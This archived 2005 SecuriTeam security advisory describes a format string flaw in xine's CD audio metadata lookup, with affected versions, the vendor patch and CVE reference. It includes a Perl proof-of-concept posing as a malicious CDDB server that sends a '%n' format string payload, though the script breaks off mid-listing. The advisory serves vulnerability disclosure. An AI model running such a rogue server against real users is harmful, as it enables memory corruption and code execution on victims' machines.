[UNIX] xine based CD Player Format String

From: SecuriTeam (support_at_securiteam.com)
Date: 10/10/05

  • Next message: SecuriTeam: "[UNIX] gnome-pty-helper utmp Display Spoofing"
    To: list@securiteam.com
    Date: 10 Oct 2005 16:08:01 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      xine based CD Player Format String
    ------------------------------------------------------------------------

    SUMMARY

    " <http://xinehq.de/> xine is a free multimedia player. It plays back CDs,
    DVDs, and VCDs. It also decodes multimedia files like AVI, MOV, WMV, and
    MP3 from local disk drives, and displays multimedia streamed over the
    Internet. It interprets many of the most common multimedia formats
    available - and some of the most uncommon formats, too."

    By setting up a malicious CDDB server, an attacker can overwrite arbitrary
    memory locations with arbitrary data using Xine based CD Players.

    DETAILS

    Vulnerable Systems:
     * Xine versions 1-beta releases starting with and including 1-beta3
     * Xine versions 1-rc releases
     * Xine versions 1.0 releases up to and including 1.0.2
     * Xine version 1.1.0 release

    Immune Systems:
     * Xine 0.9 and prior
     * Xine versions 1-alpha releases
     * Xine versions 1-beta releases prior to 1-beta3
     * Xine versions 1.0 releases starting with and including 1.0.3
     * Xine version 1.1.1

    When playing an Audio CD, using xine-lib based media application, the
    library contacts a CDDB server to retrieve metadata like the title and
    artist's name. During processing of this data, a response from the server,
    which is located in memory on the stack, is passed to the fprintf()
    function as a format string.

    An attacker can set up a malicious CDDB server and trick the client into
    using this server instead of the pre-configured one. Alternatively, any
    user and therefore the attacker can modify entries in the official CDDB
    server. Using this format string vulnerability, attacker-chosen data can
    be written to an attacker-chosen memory location. This allows the attacker
    to alter the control flow and to execute malicious code with the
    permissions of the user running the application.

    Although it requires the user to play an Audio CD, this vulnerability can
    still be exploited remotely, because a xine Audio CD MRL (media resource
    locator) could be embedded into a website.

    Vendor Status:
    The vendor as issued a patch that can be found at:
    <http://cvs.sourceforge.net/viewcvs.py/xine/xine-lib/src/input/input_cdda.c?r1=1.77&r2=1.78> http://cvs.sourceforge.net/viewcvs.py/xine/xine-lib/src/input/input_cdda.c?r1=1.77&r2=1.78.

    CVE Information:
     <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2967>
    CAN-2005-2967

    Proof of Concept:
    #!/usr/bin/perl --

    # xine-cddb-server
    # by Ulf Harnhammar in 2005
    # I hereby place this program in the public domain.

    use strict;
    use IO::Socket;

    $main::port = 8880;
    $main::timeout = 5;

    # *** SUBROUTINES ***

    sub mysend($$)
    {
      my $file = shift;
      my $str = shift;

      print $file "$str\n";
      print "SENT: $str\n";
    } # sub mysend

    sub myreceive($)
    {
      my $file = shift;
      my $inp;

      eval
      {
        local $SIG{ALRM} = sub { die "alarm\n" };
        alarm $main::timeout;
        $inp = <$file>;
        alarm 0;
      };

      if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
      $inp =~ tr/\015\012\000//d;
      print "RECEIVED: $inp\n";
      $inp;
    } # sub myreceive

    # *** MAIN PROGRAM ***

    {
      my $server = IO::Socket::INET->new( Proto => 'tcp',
                                          LocalPort => $main::port,
                                          Listen => SOMAXCONN,
                                          Reuse => 1);
      die "can't set up server!\n" unless $server;

      while (my $client = $server->accept())
      {
        $client->autoflush(1);
        print 'connection from '.$client->peerhost."\n";

        mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '.
               scalar localtime);

        while (my $str = myreceive($client))
        {
          if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)
          {
            mysend($client, "200 Hello and welcome $1\@$2 running $3.");
            next;
          }

          if ($str =~ m/^proto (\d+)$/i)
          {
            mysend($client, "201 OK, CDDB protocol level now: $1");
            next;
          }

          if ($str =~ m/^cddb query ([0-9a-f]+)/i)
          {
            mysend($client, "200 rock $1 Exploiters / Formatted and
    Stringed");
            next;
          }

          if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)
          {
            my $docum = <<HERE;
    210 $1 $2 CD database entry follows (until terminating \`.')
    # %n%n%n%n
    DISCID=$2
    DTITLE=Exploiters / Formatted and Stringed
    DYEAR=2005
    DGENRE=Rock
    TTITLE0=Format
    TTITLE1=String
    TTITLE2=Bug
    EXTD= YEAR: 2005
    EXTT0=
    EXTT1=
    EXTT2=
    PLAYORDER=

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] gnome-pty-helper utmp Display Spoofing"

    Relevant Pages

    • [NT] Multiple Vulnerabilities in WWW Fileshare Pro
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Share Pro that allow an attacker to write arbitrary files, ... server, ... The program has an option enabled by default that lets people to upload ...
      (Securiteam)
    • [NT] Citrix Neighborhood Agent Buffer Overflow and Arbitrary Shortcut Creation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Server Client and facilitates access to Citrix published applications. ... an attacker must determine the length of the ...
      (Securiteam)
    • [UNIX] Mono XSP ASP.NET Server Source Code Disclosure Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Mono XSP ASP.NET Server Source Code Disclosure Vulnerability ... Using a source code disclosure attack, an attacker can retrieve the source ...
      (Securiteam)
    • [NT] Qualcomm WorldMail IMAP Server String Literal Processing Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Qualcomm WorldMail IMAP Server String Literal Processing Overflow ... Remote exploitation of a buffer overflow vulnerability in Qualcomm ... In order to trigger this overflow, an attacker only needs to send a long ...
      (Securiteam)
    • [NEWS] Star Wars Jedi Knight: Jedi Academy Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A buffer overflow in the Star Wars Jedi Knight: Jedi Academy server allows ... a remote attacker to cause it execute arbitrary code. ...
      (Securiteam)